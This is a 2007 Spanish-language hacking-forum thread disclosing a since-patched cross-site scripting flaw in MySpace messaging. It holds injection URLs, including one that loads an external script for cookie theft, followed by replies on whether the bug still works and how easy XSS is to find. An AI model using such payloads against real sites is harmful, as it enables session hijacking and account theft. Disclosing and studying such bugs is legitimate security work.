elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Xss in Myspace Robo de Cookies		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Xss in Myspace Robo de Cookies  (Leído 7,695 veces)
Girl!

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Xss in Myspace Robo de Cookies
« en: 12 Marzo 2007, 18:57 pm »
Ha sido corregida

XSS in MySpace Robo de cookie. Descubierto y reportado por rMrGvG

Cuando queremos acceder a myspace a una direccion que no es la de inicio myspace.com(ejemplo http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=1 ) , este nos guarda la dirección completa en la cookie en los valores nextpage en la clave login de la misma ( fuseaction=login&nextPage=fuseaction=mail.inbox&mytoken=1) para redireccionarnos una vez logueados,a la variable mytoken podemos inyectarle código cerrandola mediante "> %22%3E también podemos inyectar en la variale friendID y asegurar la variable MyToken a 1de esta manera se ejecutaba el código tras loguearnos, pudiendo robar la cookie.

Aunque la inyección ya haya sido parcheada y nos hayan dejado publicarla, aun se puede demostrar la misma del siguiente modo, actualmente myspace pasa las variables a "> &quot;&gt; o nos da errores al usar < %3C sin embargo si nos logueamos erroneamente en myspace no se aplica la seguridad codificando los caracteres y vemos la inyección ahora mucho menos peligrosa, y que antes podía ser utilizada para robar cuentas de usuarios.

Ejemplo demostración de la inyeccion (debemos introducir una clave erronea para q nos muestre el código inyectado):
http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=">rMrGvG

Imagen inyección

XSS:
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><script>alert('rMrGvG')</script>&MyToken=1
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><iframe src=http://sni-labs.com></iframe>&MyToken=1

ROBO de cookies
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=<script src="http://url/script.js"></script>&MyToken=1

Fuente http://sni-labs.com
En línea
ANELKAOS
Colaborador
***
Desconectado Desconectado

Mensajes: 3.105


#include<nda.h>


Ver Perfil WWW
Re: Xss in Myspace Robo de Cookies
« Respuesta #1 en: 12 Marzo 2007, 23:54 pm »
Muy buena :) estas poniendo bien alto el listón de los XSS jeje
En línea
putus

Desconectado Desconectado

Mensajes: 56



Ver Perfil WWW
Re: Xss in Myspace Robo de Cookies
« Respuesta #2 en: 2 Mayo 2007, 20:09 pm »
esto parece que ya no sirve....
En línea
Girl!

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: Xss in Myspace Robo de Cookies
« Respuesta #3 en: 4 Mayo 2007, 03:16 am »
Sap eso pone al principio del tema :)
aquí está el momby aunque ya ha terminado y  las más importantes corregidas , pero ene l ultimo del dia 30 aparece el popurrí y algunas aun vann :)
A pàrte se muestras XSS y formas de evadirlos muy interesantess
BIssos
 :-* :-* :-* :-* :-*
MOMBY:

http://sni-labs.com/MOMBY/
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Xss in Myspace Robo de Cookies
« Respuesta #4 en: 5 Mayo 2007, 12:23 pm »
Heché un vistazo rápido a la lista de fallos y no encontré ninguno que funcionara.

Ahora este tipo se ha hecho famoso por encontrar un XSS en cada variable de myspace, bueno, no por el hecho de encontrarlas, que eso no tiene mucho merito, si no por el hecho de publicarlas...
En línea
Girl!

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: Xss in Myspace Robo de Cookies
« Respuesta #5 en: 5 Mayo 2007, 13:30 pm »
no sé a q tipo te refieres si es  a MOndo o MUstachio desde luego momby, es un pryecto donde participaron grandes, como Rsnake (ha.ckers.org), Mustlive o Awesome Andrew

Bissuus  :-* :-* :-*
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Xss in Myspace Robo de Cookies
« Respuesta #6 en: 7 Mayo 2007, 00:06 am »
Queria decir que las inyecciones XSS no tienen ningún merito encontrarlas, muchas páginas webs importantes las sufren, veáse Hotmail o Yahoo.

Digo que no tiene merito porque no es un fallo del sistema, si no un fallo del programador...
En línea
oRTNZ


Desconectado Desconectado

Mensajes: 808


no no soy malo... soy vicioso :p


Ver Perfil
Re: Xss in Myspace Robo de Cookies
« Respuesta #7 en: 7 Mayo 2007, 03:10 am »
xd.. siguen..
por mi parte puedo decir que web QUE NO haya  encontrado YO que no tenga injeccion o xss, pues QUE TIREN LA PRIMERA PIEDRA "QUIEN NO TENGA TAL PROBLEMA", aun mayor ... las variables las PODEMOS CREAR TODOS  :P, ADEMAS sigue teniendo el bug... hotmail xd  sin mas que decirles un saludo!
pd:
Citar
es un pryecto donde participaron grandes, como
GRANDES, no Gril! PUBICOS  ;D.
En línea
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.836



Ver Perfil
Re: Xss in Myspace Robo de Cookies
« Respuesta #8 en: 7 Mayo 2007, 05:35 am »
De Peru??? oRTNZ  :xD ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,

saludos..,//
MITM
En línea
https://www.latotatv.com
Código:
La Tota TV
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Xss in Myspace Robo de Cookies
« Respuesta #9 en: 7 Mayo 2007, 09:17 am »
Cita de: Man-In-the-Middle en  7 Mayo 2007, 05:35 am
De Peru??? oRTNZ  :xD ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,

saludos..,//
MITM

Eso dependerá de la configuración que tengas en tu Internet Explorer.

Hotmail está lleno de inyecciones XSS, yo me puse una tarde y saqué dos que no estaban publicadas, y por muchos foros veo cada día inyecciones a Hotmail y otras páginas webs.

¿Conclusión? No hay que ser "uno de los grandes" para encontrar una inyección XSS/SQL, y menos en myspace beta.
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Pequeña duda sobre robo de cookies
Nivel Web 		AlexPro 5 8,173 Último mensaje 21 Diciembre 2011, 02:44 am
por WHK
Cookset: automatizando el proceso de robo de cookies
Hacking 		sm1204 1 2,932 Último mensaje 18 Enero 2012, 12:41 pm
por adastra
robo de cookies con wireshark y sesion de facebook
Hacking 		ruben_linux 1 6,634 Último mensaje 18 Marzo 2012, 19:50 pm
por h3ct0r
Robo de cookies con ataque XSS
Hacking 		kutcher 7 5,948 Último mensaje 5 Agosto 2014, 15:12 pm
por Swain
Duda acerca del robo de cookies
Hacking 		Zeta1337 3 3,200 Último mensaje 4 Febrero 2018, 01:55 am
por Sp3cialK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines